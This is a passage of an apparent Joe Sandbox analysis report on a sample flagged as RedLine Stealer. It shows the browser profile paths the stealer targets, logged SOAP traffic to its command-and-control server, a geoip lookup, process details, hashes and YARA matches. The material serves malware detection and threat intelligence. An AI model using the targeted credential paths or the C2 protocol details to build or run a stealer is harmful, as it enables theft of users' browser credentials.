Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	45.137.22.227	55615	2196	C:\Users\user\Desktop\qJ64p5G1XJ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 22, 2025 14:12:11.337038040 CET	221	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 45.137.22.227:55615 Content-Length: 953613 Expect: 100-continue Accept-Encoding: gzip, deflate
Jan 22, 2025 14:12:12.973340034 CET	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Jan 2025 13:12:12 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	45.137.22.227	55615	2196	C:\Users\user\Desktop\qJ64p5G1XJ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 22, 2025 14:12:12.981959105 CET	241	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 45.137.22.227:55615 Content-Length: 953605 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jan 22, 2025 14:12:14.501149893 CET	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Jan 2025 13:12:13 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	104.26.13.31	443	2196	C:\Users\user\Desktop\qJ64p5G1XJ.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 13:12:07 UTC	64	OUT	GET /geoip HTTP/1.1 Host: api.ip.sb Connection: Keep-Alive
2025-01-22 13:12:07 UTC	943	IN	HTTP/1.1 200 OK Date: Wed, 22 Jan 2025 13:12:07 GMT Content-Type: application/json; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding Cache-Control: no-cache access-control-allow-origin: * cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w97DqhFY5NQzzVFOln2wUQNGv%2FGUZwNv9auycr4xPf8VTHj%2F6QEehS%2B77IIyVmQrJwtucaBLu200rSAZSu9nb9W1Et%2FGTfKjkfIdswFBcn9gltl1vlFJja0cuQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 905fcb37daf543da-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1632&rtt_var=625&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2807&recv_bytes=678&delivery_rate=1789215&cwnd=203&unsent_bytes=0&cid=6ec1f7edea3492bd&ts=434&x=0"
2025-01-22 13:12:07 UTC	351	IN	Data Raw: 31 35 38 0d 0a 7b 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 36 36 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 22 2c 22 6f 66 66 73 65 74 22 3a 2d 31 38 30 30 30 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 61 73 6e 5f 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 6c 61 74 69 74 75 64 65 Data Ascii: 158{"organization":"CenturyLink","longitude":-74.0066,"city":"New York","timezone":"America\/New_York","isp":"CenturyLink","offset":-18000,"region":"New York","asn":3356,"asn_organization":"LEVEL3","country":"United States","ip":"8.46.123.189","latitude
2025-01-22 13:12:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	08:11:55
Start date:	22/01/2025
Path:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\qJ64p5G1XJ.exe"
Imagebase:	0x330000
File size:	649'216 bytes
MD5 hash:	D666C758BE2A66A4C8E0D3C089EA75B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1735815535.000000000426B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1735815535.000000000426B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1735815535.000000000426B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:11:59
Start date:	22/01/2025
Path:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\qJ64p5G1XJ.exe"
Imagebase:	0x160000
File size:	649'216 bytes
MD5 hash:	D666C758BE2A66A4C8E0D3C089EA75B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:11:59
Start date:	22/01/2025
Path:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\qJ64p5G1XJ.exe"
Imagebase:	0x390000
File size:	649'216 bytes
MD5 hash:	D666C758BE2A66A4C8E0D3C089EA75B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:11:59
Start date:	22/01/2025
Path:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\qJ64p5G1XJ.exe"
Imagebase:	0x5b0000
File size:	649'216 bytes
MD5 hash:	D666C758BE2A66A4C8E0D3C089EA75B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:11:59
Start date:	22/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to lowest risk score due to lack of data" ] }
Date: unknown

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report qJ64p5G1XJ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\qJ64p5G1XJ.exe.log

C:\Users\user\AppData\Local\Temp\tmp1E8B.tmp

C:\Users\user\AppData\Local\Temp\tmp1E8C.tmp

C:\Users\user\AppData\Local\Temp\tmp1E9D.tmp

C:\Users\user\AppData\Local\Temp\tmp1E9E.tmp

C:\Users\user\AppData\Local\Temp\tmp1EAE.tmp

C:\Users\user\AppData\Local\Temp\tmp1ECF.tmp

C:\Users\user\AppData\Local\Temp\tmp1EDF.tmp

C:\Users\user\AppData\Local\Temp\tmp1EE0.tmp

C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp

C:\Users\user\AppData\Local\Temp\tmp250.tmp

C:\Users\user\AppData\Local\Temp\tmp261.tmp

C:\Users\user\AppData\Local\Temp\tmp272.tmp

C:\Users\user\AppData\Local\Temp\tmp273.tmp

C:\Users\user\AppData\Local\Temp\tmp283.tmp

Windows Analysis Report
qJ64p5G1XJ.exe